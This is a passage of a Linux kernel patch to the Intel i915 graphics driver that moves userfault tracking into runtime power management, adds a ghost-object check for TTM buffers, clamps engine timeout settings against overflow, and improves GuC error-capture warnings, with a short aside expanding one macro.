+--- a/drivers/gpu/drm/i915/gem/i915_gem_mman.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+@@ -413,7 +413,7 @@ retry:
+ 	vma->mmo = mmo;
+ 
+ 	if (CONFIG_DRM_I915_USERFAULT_AUTOSUSPEND)
+-		intel_wakeref_auto(&to_gt(i915)->userfault_wakeref,
++		intel_wakeref_auto(&i915->runtime_pm.userfault_wakeref,
+ 				   msecs_to_jiffies_timeout(CONFIG_DRM_I915_USERFAULT_AUTOSUSPEND));
+ 
+ 	if (write) {
+@@ -557,11 +557,13 @@ void i915_gem_object_runtime_pm_release_mmap_offset(struct drm_i915_gem_object *
+ 
+ 	drm_vma_node_unmap(&bo->base.vma_node, bdev->dev_mapping);
+ 
+-	if (obj->userfault_count) {
+-		/* rpm wakeref provide exclusive access */
+-		list_del(&obj->userfault_link);
+-		obj->userfault_count = 0;
+-	}
++	/*
++	 * We have exclusive access here via runtime suspend. All other callers
++	 * must first grab the rpm wakeref.
++	 */
++	GEM_BUG_ON(!obj->userfault_count);
++	list_del(&obj->userfault_link);
++	obj->userfault_count = 0;
+ }
+ 
+ void i915_gem_object_release_mmap_offset(struct drm_i915_gem_object *obj)
+@@ -587,13 +589,6 @@ void i915_gem_object_release_mmap_offset(struct drm_i915_gem_object *obj)
+ 		spin_lock(&obj->mmo.lock);
+ 	}
+ 	spin_unlock(&obj->mmo.lock);
+-
+-	if (obj->userfault_count) {
+-		mutex_lock(&to_gt(to_i915(obj->base.dev))->lmem_userfault_lock);
+-		list_del(&obj->userfault_link);
+-		mutex_unlock(&to_gt(to_i915(obj->base.dev))->lmem_userfault_lock);
+-		obj->userfault_count = 0;
+-	}
+ }
+ 
+ static struct i915_mmap_offset *
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_pm.c b/drivers/gpu/drm/i915/gem/i915_gem_pm.c
+index 3428f735e786c..8d30db5e678c4 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_pm.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_pm.c
+@@ -24,7 +24,7 @@ void i915_gem_suspend(struct drm_i915_private *i915)
+ {
+ 	GEM_TRACE("%s\n", dev_name(i915->drm.dev));
+ 
+-	intel_wakeref_auto(&to_gt(i915)->userfault_wakeref, 0);
++	intel_wakeref_auto(&i915->runtime_pm.userfault_wakeref, 0);
+ 	flush_workqueue(i915->wq);
+ 
+ 	/*
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_ttm.c b/drivers/gpu/drm/i915/gem/i915_gem_ttm.c
+index 0d6d640225fc8..be4c081e7e13d 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_ttm.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_ttm.c
+@@ -279,7 +279,7 @@ static struct ttm_tt *i915_ttm_tt_create(struct ttm_buffer_object *bo,
+ 	struct i915_ttm_tt *i915_tt;
+ 	int ret;
+ 
+-	if (!obj)
++	if (i915_ttm_is_ghost_object(bo))
+ 		return NULL;
+ 
+ 	i915_tt = kzalloc(sizeof(*i915_tt), GFP_KERNEL);
+@@ -362,7 +362,7 @@ static bool i915_ttm_eviction_valuable(struct ttm_buffer_object *bo,
+ {
+ 	struct drm_i915_gem_object *obj = i915_ttm_to_gem(bo);
+ 
+-	if (!obj)
++	if (i915_ttm_is_ghost_object(bo))
+ 		return false;
+ 
+ 	/*
+@@ -509,18 +509,9 @@ static int i915_ttm_shrink(struct drm_i915_gem_object *obj, unsigned int flags)
+ static void i915_ttm_delete_mem_notify(struct ttm_buffer_object *bo)
+ {
+ 	struct drm_i915_gem_object *obj = i915_ttm_to_gem(bo);
+-	intel_wakeref_t wakeref = 0;
+-
+-	if (bo->resource && likely(obj)) {
+-		/* ttm_bo_release() already has dma_resv_lock */
+-		if (i915_ttm_cpu_maps_iomem(bo->resource))
+-			wakeref = intel_runtime_pm_get(&to_i915(obj->base.dev)->runtime_pm);
+ 
++	if (bo->resource && !i915_ttm_is_ghost_object(bo)) {
+ 		__i915_gem_object_pages_fini(obj);
+-
+-		if (wakeref)
+-			intel_runtime_pm_put(&to_i915(obj->base.dev)->runtime_pm, wakeref);
+-
+ 		i915_ttm_free_cached_io_rsgt(obj);
+ 	}
+ }
+@@ -628,7 +619,7 @@ static void i915_ttm_swap_notify(struct ttm_buffer_object *bo)
+ 	struct drm_i915_gem_object *obj = i915_ttm_to_gem(bo);
+ 	int ret;
+ 
+-	if (!obj)
++	if (i915_ttm_is_ghost_object(bo))
+ 		return;
+ 
+ 	ret = i915_ttm_move_notify(bo);
+@@ -661,7 +652,7 @@ static int i915_ttm_io_mem_reserve(struct ttm_device *bdev, struct ttm_resource
+ 	struct drm_i915_gem_object *obj = i915_ttm_to_gem(mem->bo);
+ 	bool unknown_state;
+ 
+-	if (!obj)
++	if (i915_ttm_is_ghost_object(mem->bo))
+ 		return -EINVAL;
+ 
+ 	if (!kref_get_unless_zero(&obj->base.refcount))
+@@ -694,7 +685,7 @@ static unsigned long i915_ttm_io_mem_pfn(struct ttm_buffer_object *bo,
+ 	unsigned long base;
+ 	unsigned int ofs;
+ 
+-	GEM_BUG_ON(!obj);
++	GEM_BUG_ON(i915_ttm_is_ghost_object(bo));
+ 	GEM_WARN_ON(bo->ttm);
+ 
+ 	base = obj->mm.region->iomap.base - obj->mm.region->region.start;
+@@ -994,13 +985,12 @@ static vm_fault_t vm_fault_ttm(struct vm_fault *vmf)
+ 	struct vm_area_struct *area = vmf->vma;
+ 	struct ttm_buffer_object *bo = area->vm_private_data;
+ 	struct drm_device *dev = bo->base.dev;
+-	struct drm_i915_gem_object *obj;
++	struct drm_i915_gem_object *obj = i915_ttm_to_gem(bo);
+ 	intel_wakeref_t wakeref = 0;
+ 	vm_fault_t ret;
+ 	int idx;
+ 
+-	obj = i915_ttm_to_gem(bo);
+-	if (!obj)
++	if (i915_ttm_is_ghost_object(bo))
+ 		return VM_FAULT_SIGBUS;
+ 
+ 	/* Sanity check that we allow writing into this object */
+@@ -1057,16 +1047,19 @@ static vm_fault_t vm_fault_ttm(struct vm_fault *vmf)
+ 	if (ret == VM_FAULT_RETRY && !(vmf->flags & FAULT_FLAG_RETRY_NOWAIT))
+ 		goto out_rpm;
+ 
+-	/* ttm_bo_vm_reserve() already has dma_resv_lock */
++	/*
++	 * ttm_bo_vm_reserve() already has dma_resv_lock.
++	 * userfault_count is protected by dma_resv lock and rpm wakeref.
++	 */
+ 	if (ret == VM_FAULT_NOPAGE && wakeref && !obj->userfault_count) {
+ 		obj->userfault_count = 1;
+-		mutex_lock(&to_gt(to_i915(obj->base.dev))->lmem_userfault_lock);
+-		list_add(&obj->userfault_link, &to_gt(to_i915(obj->base.dev))->lmem_userfault_list);
+-		mutex_unlock(&to_gt(to_i915(obj->base.dev))->lmem_userfault_lock);
++		spin_lock(&to_i915(obj->base.dev)->runtime_pm.lmem_userfault_lock);
++		list_add(&obj->userfault_link, &to_i915(obj->base.dev)->runtime_pm.lmem_userfault_list);
++		spin_unlock(&to_i915(obj->base.dev)->runtime_pm.lmem_userfault_lock);
+ 	}
+ 
+ 	if (wakeref & CONFIG_DRM_I915_USERFAULT_AUTOSUSPEND)
+-		intel_wakeref_auto(&to_gt(to_i915(obj->base.dev))->userfault_wakeref,
++		intel_wakeref_auto(&to_i915(obj->base.dev)->runtime_pm.userfault_wakeref,
+ 				   msecs_to_jiffies_timeout(CONFIG_DRM_I915_USERFAULT_AUTOSUSPEND));
+ 
+ 	i915_ttm_adjust_lru(obj);
+@@ -1098,7 +1091,7 @@ static void ttm_vm_open(struct vm_area_struct *vma)
+ 	struct drm_i915_gem_object *obj =
+ 		i915_ttm_to_gem(vma->vm_private_data);
+ 
+-	GEM_BUG_ON(!obj);
++	GEM_BUG_ON(i915_ttm_is_ghost_object(vma->vm_private_data));
+ 	i915_gem_object_get(obj);
+ }
+ 
+@@ -1107,7 +1100,7 @@ static void ttm_vm_close(struct vm_area_struct *vma)
+ 	struct drm_i915_gem_object *obj =
+ 		i915_ttm_to_gem(vma->vm_private_data);
+ 
+-	GEM_BUG_ON(!obj);
++	GEM_BUG_ON(i915_ttm_is_ghost_object(vma->vm_private_data));
+ 	i915_gem_object_put(obj);
+ }
+ 
+@@ -1128,7 +1121,27 @@ static u64 i915_ttm_mmap_offset(struct drm_i915_gem_object *obj)
+ 
+ static void i915_ttm_unmap_virtual(struct drm_i915_gem_object *obj)
+ {
++	struct ttm_buffer_object *bo = i915_gem_to_ttm(obj);
++	intel_wakeref_t wakeref = 0;
++
++	assert_object_held_shared(obj);
++
++	if (i915_ttm_cpu_maps_iomem(bo->resource)) {
++		wakeref = intel_runtime_pm_get(&to_i915(obj->base.dev)->runtime_pm);
++
++		/* userfault_count is protected by obj lock and rpm wakeref. */
++		if (obj->userfault_count) {
++			spin_lock(&to_i915(obj->base.dev)->runtime_pm.lmem_userfault_lock);
++			list_del(&obj->userfault_link);
++			spin_unlock(&to_i915(obj->base.dev)->runtime_pm.lmem_userfault_lock);
++			obj->userfault_count = 0;
++		}
++	}
++
+ 	ttm_bo_unmap_virtual(i915_gem_to_ttm(obj));
++
++	if (wakeref)
++		intel_runtime_pm_put(&to_i915(obj->base.dev)->runtime_pm, wakeref);
+ }
+ 
+ static const struct drm_i915_gem_object_ops i915_gem_ttm_obj_ops = {
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_ttm.h b/drivers/gpu/drm/i915/gem/i915_gem_ttm.h
+index e4842b4296fc2..2a94a99ef76b4 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_ttm.h
++++ b/drivers/gpu/drm/i915/gem/i915_gem_ttm.h
+@@ -27,19 +27,27 @@ i915_gem_to_ttm(struct drm_i915_gem_object *obj)
+  */
+ void i915_ttm_bo_destroy(struct ttm_buffer_object *bo);
+ 
++/**
++ * i915_ttm_is_ghost_object - Check if the ttm bo is a ghost object.
++ * @bo: Pointer to the ttm buffer object
++ *
++ * Return: True if the ttm bo is not an i915 object but a ghost ttm object,
++ * False otherwise.
++ */
++static inline bool i915_ttm_is_ghost_object(struct ttm_buffer_object *bo)
++{
++	return bo->destroy != i915_ttm_bo_destroy;
++}
++
+ /**
+  * i915_ttm_to_gem - Convert a struct ttm_buffer_object to an embedding
+  * struct drm_i915_gem_object.
+  *
+- * Return: Pointer to the embedding struct ttm_buffer_object, or NULL
+- * if the object was not an i915 ttm object.
++ * Return: Pointer to the embedding struct drm_i915_gem_object.
+  */
+ static inline struct drm_i915_gem_object *
+ i915_ttm_to_gem(struct ttm_buffer_object *bo)
+ {
+-	if (bo->destroy != i915_ttm_bo_destroy)
+-		return NULL;
+-
+ 	return container_of(bo, struct drm_i915_gem_object, __do_not_access);
+ }
+ 
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_ttm_move.c b/drivers/gpu/drm/i915/gem/i915_gem_ttm_move.c
+index 9a7e50534b84b..f59f812dc6d29 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_ttm_move.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_ttm_move.c
+@@ -560,7 +560,7 @@ int i915_ttm_move(struct ttm_buffer_object *bo, bool evict,
+ 	bool clear;
+ 	int ret;
+ 
+-	if (GEM_WARN_ON(!obj)) {
++	if (GEM_WARN_ON(i915_ttm_is_ghost_object(bo))) {
+ 		ttm_bo_move_null(bo, dst_mem);
+ 		return 0;
+ 	}
+diff --git a/drivers/gpu/drm/i915/gt/intel_engine.h b/drivers/gpu/drm/i915/gt/intel_engine.h
+index 04e435bce79bd..cbc8b857d5f7a 100644
+--- a/drivers/gpu/drm/i915/gt/intel_engine.h
++++ b/drivers/gpu/drm/i915/gt/intel_engine.h
+@@ -348,4 +348,10 @@ intel_engine_get_hung_context(struct intel_engine_cs *engine)
+ 	return engine->hung_ce;
+ }
+ 
++u64 intel_clamp_heartbeat_interval_ms(struct intel_engine_cs *engine, u64 value);
++u64 intel_clamp_max_busywait_duration_ns(struct intel_engine_cs *engine, u64 value);
++u64 intel_clamp_preempt_timeout_ms(struct intel_engine_cs *engine, u64 value);
++u64 intel_clamp_stop_timeout_ms(struct intel_engine_cs *engine, u64 value);
++u64 intel_clamp_timeslice_duration_ms(struct intel_engine_cs *engine, u64 value);
++
+ #endif /* _INTEL_RINGBUFFER_H_ */
+diff --git a/drivers/gpu/drm/i915/gt/intel_engine_cs.c b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+index 1f7188129cd1f..83bfeb872bdaa 100644
+--- a/drivers/gpu/drm/i915/gt/intel_engine_cs.c
++++ b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+@@ -486,6 +486,17 @@ static int intel_engine_setup(struct intel_gt *gt, enum intel_engine_id id,
+ 	engine->logical_mask = BIT(logical_instance);
+ 	__sprint_engine_name(engine);
+ 
++	if ((engine->class == COMPUTE_CLASS && !RCS_MASK(engine->gt) &&
++	     __ffs(CCS_MASK(engine->gt)) == engine->instance) ||
++	     engine->class == RENDER_CLASS)
++		engine->flags |= I915_ENGINE_FIRST_RENDER_COMPUTE;
++
++	/* features common between engines sharing EUs */
++	if (engine->class == RENDER_CLASS || engine->class == COMPUTE_CLASS) {
++		engine->flags |= I915_ENGINE_HAS_RCS_REG_STATE;
++		engine->flags |= I915_ENGINE_HAS_EU_PRIORITY;
++	}
++
+ 	engine->props.heartbeat_interval_ms =
+ 		CONFIG_DRM_I915_HEARTBEAT_INTERVAL;
+ 	engine->props.max_busywait_duration_ns =
+@@ -498,19 +509,28 @@ static int intel_engine_setup(struct intel_gt *gt, enum intel_engine_id id,
+ 		CONFIG_DRM_I915_TIMESLICE_DURATION;
+ 
+ 	/* Override to uninterruptible for OpenCL workloads. */
+-	if (GRAPHICS_VER(i915) == 12 && engine->class == RENDER_CLASS)
++	if (GRAPHICS_VER(i915) == 12 && (engine->flags & I915_ENGINE_HAS_RCS_REG_STATE))
+ 		engine->props.preempt_timeout_ms = 0;
+ 
+-	if ((engine->class == COMPUTE_CLASS && !RCS_MASK(engine->gt) &&
+-	     __ffs(CCS_MASK(engine->gt)) == engine->instance) ||
+-	     engine->class == RENDER_CLASS)
+-		engine->flags |= I915_ENGINE_FIRST_RENDER_COMPUTE;
+-
+-	/* features common between engines sharing EUs */
+-	if (engine->class == RENDER_CLASS || engine->class == COMPUTE_CLASS) {
+-		engine->flags |= I915_ENGINE_HAS_RCS_REG_STATE;
+-		engine->flags |= I915_ENGINE_HAS_EU_PRIORITY;
+-	}
++	/* Cap properties according to any system limits */
++#define CLAMP_PROP(field) \
++	do { \
++		u64 clamp = intel_clamp_##field(engine, engine->props.field); \
++		if (clamp != engine->props.field) { \
++			drm_notice(&engine->i915->drm, \
++				   "Warning, clamping %s to %lld to prevent overflow\n", \
++				   #field, clamp); \
++			engine->props.field = clamp; \
++		} \
++	} while (0)
++
++	CLAMP_PROP(heartbeat_interval_ms);
++	CLAMP_PROP(max_busywait_duration_ns);
++	CLAMP_PROP(preempt_timeout_ms);
++	CLAMP_PROP(stop_timeout_ms);
++	CLAMP_PROP(timeslice_duration_ms);
++
++#undef CLAMP_PROP
+ 
+ 	engine->defaults = engine->props; /* never to change again */
+ 
+@@ -534,6 +554,55 @@ static int intel_engine_setup(struct intel_gt *gt, enum intel_engine_id id,
+ 	return 0;
+ }
+ 
++u64 intel_clamp_heartbeat_interval_ms(struct intel_engine_cs *engine, u64 value)
++{
++	value = min_t(u64, value, jiffies_to_msecs(MAX_SCHEDULE_TIMEOUT));
++
++	return value;
++}
++
++u64 intel_clamp_max_busywait_duration_ns(struct intel_engine_cs *engine, u64 value)
++{
++	value = min(value, jiffies_to_nsecs(2));
++
++	return value;
++}
++
++u64 intel_clamp_preempt_timeout_ms(struct intel_engine_cs *engine, u64 value)
++{
++	/*
++	 * NB: The GuC API only supports 32bit values. However, the limit is further
++	 * reduced due to internal calculations which would otherwise overflow.
++	 */
++	if (intel_guc_submission_is_wanted(&engine->gt->uc.guc))
++		value = min_t(u64, value, guc_policy_max_preempt_timeout_ms());
++
++	value = min_t(u64, value, jiffies_to_msecs(MAX_SCHEDULE_TIMEOUT));
++
++	return value;
++}
++
++u64 intel_clamp_stop_timeout_ms(struct intel_engine_cs *engine, u64 value)
++{
++	value = min_t(u64, value, jiffies_to_msecs(MAX_SCHEDULE_TIMEOUT));
++
++	return value;
++}
++
++u64 intel_clamp_timeslice_duration_ms(struct intel_engine_cs *engine, u64 value)
++{
++	/*
++	 * NB: The GuC API only supports 32bit values. However, the limit is further
++	 * reduced due to internal calculations which would otherwise overflow.
++	 */
++	if (intel_guc_submission_is_wanted(&engine->gt->uc.guc))
++		value = min_t(u64, value, guc_policy_max_exec_quantum_ms());
++
++	value = min_t(u64, value, jiffies_to_msecs(MAX_SCHEDULE_TIMEOUT));
++
++	return value;
++}
++
+ static void __setup_engine_capabilities(struct intel_engine_cs *engine)
+ {
+ 	struct drm_i915_private *i915 = engine->i915;
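
For reference, one instance of the CLAMP_PROP() macro above expands, modulo
the stringification, to plain clamp-and-warn code:

    do {
            u64 clamp = intel_clamp_preempt_timeout_ms(engine,
                                engine->props.preempt_timeout_ms);
            if (clamp != engine->props.preempt_timeout_ms) {
                    drm_notice(&engine->i915->drm,
                               "Warning, clamping preempt_timeout_ms to %lld to prevent overflow\n",
                               clamp);
                    engine->props.preempt_timeout_ms = clamp;
            }
    } while (0);
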
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt.c b/drivers/gpu/drm/i915/gt/intel_gt.c
+index 7caa3412a2446..c7db49749a636 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt.c
+@@ -40,8 +40,6 @@ void intel_gt_common_init_early(struct intel_gt *gt)
+ {
+ 	spin_lock_init(gt->irq_lock);
+ 
+-	INIT_LIST_HEAD(&gt->lmem_userfault_list);
+-	mutex_init(&gt->lmem_userfault_lock);
+ 	INIT_LIST_HEAD(&gt->closed_vma);
+ 	spin_lock_init(&gt->closed_lock);
+ 
+@@ -812,7 +810,6 @@ static int intel_gt_tile_setup(struct intel_gt *gt, phys_addr_t phys_addr)
+ 	}
+ 
+ 	intel_uncore_init_early(gt->uncore, gt);
+-	intel_wakeref_auto_init(&gt->userfault_wakeref, gt->uncore->rpm);
+ 
+ 	ret = intel_uncore_setup_mmio(gt->uncore, phys_addr);
+ 	if (ret)
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_types.h b/drivers/gpu/drm/i915/gt/intel_gt_types.h
+index f19c2de77ff66..184ee9b11a4da 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_types.h
++++ b/drivers/gpu/drm/i915/gt/intel_gt_types.h
+@@ -141,20 +141,6 @@ struct intel_gt {
+ 	struct intel_wakeref wakeref;
+ 	atomic_t user_wakeref;
+ 
+-	/**
+-	 *  Protects access to lmem usefault list.
+-	 *  It is required, if we are outside of the runtime suspend path,
+-	 *  access to @lmem_userfault_list requires always first grabbing the
+-	 *  runtime pm, to ensure we can't race against runtime suspend.
+-	 *  Once we have that we also need to grab @lmem_userfault_lock,
+-	 *  at which point we have exclusive access.
+-	 *  The runtime suspend path is special since it doesn't really hold any locks,
+-	 *  but instead has exclusive access by virtue of all other accesses requiring
+-	 *  holding the runtime pm wakeref.
+-	 */
+-	struct mutex lmem_userfault_lock;
+-	struct list_head lmem_userfault_list;
+-
+ 	struct list_head closed_vma;
+ 	spinlock_t closed_lock; /* guards the list of closed_vma */
+ 
+@@ -170,9 +156,6 @@ struct intel_gt {
+ 	 */
+ 	intel_wakeref_t awake;
+ 
+-	/* Manual runtime pm autosuspend delay for user GGTT/lmem mmaps */
+-	struct intel_wakeref_auto userfault_wakeref;
+-
+ 	u32 clock_frequency;
+ 	u32 clock_period_ns;
+ 
+diff --git a/drivers/gpu/drm/i915/gt/sysfs_engines.c b/drivers/gpu/drm/i915/gt/sysfs_engines.c
+index 9670310562029..f2d9858d827c2 100644
+--- a/drivers/gpu/drm/i915/gt/sysfs_engines.c
++++ b/drivers/gpu/drm/i915/gt/sysfs_engines.c
+@@ -144,7 +144,7 @@ max_spin_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 	       const char *buf, size_t count)
+ {
+ 	struct intel_engine_cs *engine = kobj_to_engine(kobj);
+-	unsigned long long duration;
++	unsigned long long duration, clamped;
+ 	int err;
+ 
+ 	/*
+@@ -168,7 +168,8 @@ max_spin_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 	if (err)
+ 		return err;
+ 
+-	if (duration > jiffies_to_nsecs(2))
++	clamped = intel_clamp_max_busywait_duration_ns(engine, duration);
++	if (duration != clamped)
+ 		return -EINVAL;
+ 
+ 	WRITE_ONCE(engine->props.max_busywait_duration_ns, duration);
+@@ -203,7 +204,7 @@ timeslice_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 		const char *buf, size_t count)
+ {
+ 	struct intel_engine_cs *engine = kobj_to_engine(kobj);
+-	unsigned long long duration;
++	unsigned long long duration, clamped;
+ 	int err;
+ 
+ 	/*
+@@ -218,7 +219,8 @@ timeslice_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 	if (err)
+ 		return err;
+ 
+-	if (duration > jiffies_to_msecs(MAX_SCHEDULE_TIMEOUT))
++	clamped = intel_clamp_timeslice_duration_ms(engine, duration);
++	if (duration != clamped)
+ 		return -EINVAL;
+ 
+ 	WRITE_ONCE(engine->props.timeslice_duration_ms, duration);
+@@ -256,7 +258,7 @@ stop_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 	   const char *buf, size_t count)
+ {
+ 	struct intel_engine_cs *engine = kobj_to_engine(kobj);
+-	unsigned long long duration;
++	unsigned long long duration, clamped;
+ 	int err;
+ 
+ 	/*
+@@ -272,7 +274,8 @@ stop_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 	if (err)
+ 		return err;
+ 
+-	if (duration > jiffies_to_msecs(MAX_SCHEDULE_TIMEOUT))
++	clamped = intel_clamp_stop_timeout_ms(engine, duration);
++	if (duration != clamped)
+ 		return -EINVAL;
+ 
+ 	WRITE_ONCE(engine->props.stop_timeout_ms, duration);
+@@ -306,7 +309,7 @@ preempt_timeout_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 		      const char *buf, size_t count)
+ {
+ 	struct intel_engine_cs *engine = kobj_to_engine(kobj);
+-	unsigned long long timeout;
++	unsigned long long timeout, clamped;
+ 	int err;
+ 
+ 	/*
+@@ -322,7 +325,8 @@ preempt_timeout_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 	if (err)
+ 		return err;
+ 
+-	if (timeout > jiffies_to_msecs(MAX_SCHEDULE_TIMEOUT))
++	clamped = intel_clamp_preempt_timeout_ms(engine, timeout);
++	if (timeout != clamped)
+ 		return -EINVAL;
+ 
+ 	WRITE_ONCE(engine->props.preempt_timeout_ms, timeout);
+@@ -362,7 +366,7 @@ heartbeat_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 		const char *buf, size_t count)
+ {
+ 	struct intel_engine_cs *engine = kobj_to_engine(kobj);
+-	unsigned long long delay;
++	unsigned long long delay, clamped;
+ 	int err;
+ 
+ 	/*
+@@ -379,7 +383,8 @@ heartbeat_store(struct kobject *kobj, struct kobj_attribute *attr,
+ 	if (err)
+ 		return err;
+ 
+-	if (delay >= jiffies_to_msecs(MAX_SCHEDULE_TIMEOUT))
++	clamped = intel_clamp_heartbeat_interval_ms(engine, delay);
++	if (delay != clamped)
+ 		return -EINVAL;
+ 
+ 	err = intel_engine_set_heartbeat(engine, delay);
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
+index 8f11651460131..685ddccc0f26a 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
+@@ -165,7 +165,7 @@ static const struct __guc_mmio_reg_descr empty_regs_list[] = {
+ 	}
+ 
+ /* List of lists */
+-static struct __guc_mmio_reg_descr_group default_lists[] = {
++static const struct __guc_mmio_reg_descr_group default_lists[] = {
+ 	MAKE_REGLIST(default_global_regs, PF, GLOBAL, 0),
+ 	MAKE_REGLIST(default_rc_class_regs, PF, ENGINE_CLASS, GUC_RENDER_CLASS),
+ 	MAKE_REGLIST(xe_lpd_rc_inst_regs, PF, ENGINE_INSTANCE, GUC_RENDER_CLASS),
+@@ -419,6 +419,44 @@ guc_capture_get_device_reglist(struct intel_guc *guc)
+ 	return default_lists;
+ }
+ 
++static const char *
++__stringify_type(u32 type)
++{
++	switch (type) {
++	case GUC_CAPTURE_LIST_TYPE_GLOBAL:
++		return "Global";
++	case GUC_CAPTURE_LIST_TYPE_ENGINE_CLASS:
++		return "Class";
++	case GUC_CAPTURE_LIST_TYPE_ENGINE_INSTANCE:
++		return "Instance";
++	default:
++		break;
++	}
++
++	return "unknown";
++}
++
++static const char *
++__stringify_engclass(u32 class)
++{
++	switch (class) {
++	case GUC_RENDER_CLASS:
++		return "Render";
++	case GUC_VIDEO_CLASS:
++		return "Video";
++	case GUC_VIDEOENHANCE_CLASS:
++		return "VideoEnhance";
++	case GUC_BLITTER_CLASS:
++		return "Blitter";
++	case GUC_COMPUTE_CLASS:
++		return "Compute";
++	default:
++		break;
++	}
++
++	return "unknown";
++}
++
+ static int
+ guc_capture_list_init(struct intel_guc *guc, u32 owner, u32 type, u32 classid,
+ 		      struct guc_mmio_reg *ptr, u16 num_entries)
+@@ -482,32 +520,55 @@ guc_cap_list_num_regs(struct intel_guc_state_capture *gc, u32 owner, u32 type, u
+ 	return num_regs;
+ }
+ 
+-int
+-intel_guc_capture_getlistsize(struct intel_guc *guc, u32 owner, u32 type, u32 classid,
+-			      size_t *size)
++static int
++guc_capture_getlistsize(struct intel_guc *guc, u32 owner, u32 type, u32 classid,
++			size_t *size, bool is_purpose_est)
+ {
+ 	struct intel_guc_state_capture *gc = guc->capture;
++	struct drm_i915_private *i915 = guc_to_gt(guc)->i915;
+ 	struct __guc_capture_ads_cache *cache = &gc->ads_cache[owner][type][classid];
+ 	int num_regs;
+ 
+-	if (!gc->reglists)
++	if (!gc->reglists) {
++		drm_warn(&i915->drm, "GuC-capture: No reglist on this device\n");
+ 		return -ENODEV;
++	}
+ 
+ 	if (cache->is_valid) {
+ 		*size = cache->size;
+ 		return cache->status;
+ 	}
+ 
++	if (!is_purpose_est && owner == GUC_CAPTURE_LIST_INDEX_PF &&
++	    !guc_capture_get_one_list(gc->reglists, owner, type, classid)) {
++		if (type == GUC_CAPTURE_LIST_TYPE_GLOBAL)
++			drm_warn(&i915->drm, "Missing GuC-Err-Cap reglist Global!\n");
++		else
++			drm_warn(&i915->drm, "Missing GuC-Err-Cap reglist %s(%u):%s(%u)!\n",
++				 __stringify_type(type), type,
++				 __stringify_engclass(classid), classid);
++		return -ENODATA;
++	}
++
+ 	num_regs = guc_cap_list_num_regs(gc, owner, type, classid);
++	/* intentional empty lists can exist depending on hw config */
+ 	if (!num_regs)
+ 		return -ENODATA;
+ 
+-	*size = PAGE_ALIGN((sizeof(struct guc_debug_capture_list)) +
+-			   (num_regs * sizeof(struct guc_mmio_reg)));
++	if (size)
++		*size = PAGE_ALIGN((sizeof(struct guc_debug_capture_list)) +
++				   (num_regs * sizeof(struct guc_mmio_reg)));
+ 
+ 	return 0;
+ }
+ 
++int
++intel_guc_capture_getlistsize(struct intel_guc *guc, u32 owner, u32 type, u32 classid,
++			      size_t *size)
++{
++	return guc_capture_getlistsize(guc, owner, type, classid, size, false);
++}
++
+ static void guc_capture_create_prealloc_nodes(struct intel_guc *guc);
+ 
+ int
+@@ -606,7 +667,7 @@ guc_capture_output_min_size_est(struct intel_guc *guc)
+ 	struct intel_gt *gt = guc_to_gt(guc);
+ 	struct intel_engine_cs *engine;
+ 	enum intel_engine_id id;
+-	int worst_min_size = 0, num_regs = 0;
++	int worst_min_size = 0;
+ 	size_t tmp = 0;
+ 
+ 	if (!guc->capture)
+@@ -627,21 +688,19 @@ guc_capture_output_min_size_est(struct intel_guc *guc)
+ 		worst_min_size += sizeof(struct guc_state_capture_group_header_t) +
+ 					 (3 * sizeof(struct guc_state_capture_header_t));
+ 
+-		if (!intel_guc_capture_getlistsize(guc, 0, GUC_CAPTURE_LIST_TYPE_GLOBAL, 0, &tmp))
+-			num_regs += tmp;
++		if (!guc_capture_getlistsize(guc, 0, GUC_CAPTURE_LIST_TYPE_GLOBAL, 0, &tmp, true))
++			worst_min_size += tmp;
+ 
+-		if (!intel_guc_capture_getlistsize(guc, 0, GUC_CAPTURE_LIST_TYPE_ENGINE_CLASS,
+-						   engine->class, &tmp)) {
+-			num_regs += tmp;
++		if (!guc_capture_getlistsize(guc, 0, GUC_CAPTURE_LIST_TYPE_ENGINE_CLASS,
++					     engine->class, &tmp, true)) {
++			worst_min_size += tmp;
+ 		}
+-		if (!intel_guc_capture_getlistsize(guc, 0, GUC_CAPTURE_LIST_TYPE_ENGINE_INSTANCE,
+-						   engine->class, &tmp)) {
+-			num_regs += tmp;
++		if (!guc_capture_getlistsize(guc, 0, GUC_CAPTURE_LIST_TYPE_ENGINE_INSTANCE,
++					     engine->class, &tmp, true)) {
++			worst_min_size += tmp;
+ 		}
+ 	}
+ 
+-	worst_min_size += (num_regs * sizeof(struct guc_mmio_reg));
+-
+ 	return worst_min_size;
+ }
+ 
+@@ -658,15 +717,23 @@ static void check_guc_capture_size(struct intel_guc *guc)
+ 	int spare_size = min_size * GUC_CAPTURE_OVERBUFFER_MULTIPLIER;
+ 	u32 buffer_size = intel_guc_log_section_size_capture(&guc->log);
+ 
++	/*
++	 * NOTE: min_size is much smaller than the capture region allocation (DG2: <80K vs 1MB).
++	 * Additionally, it's based on the space needed to fit all engines getting reset at once
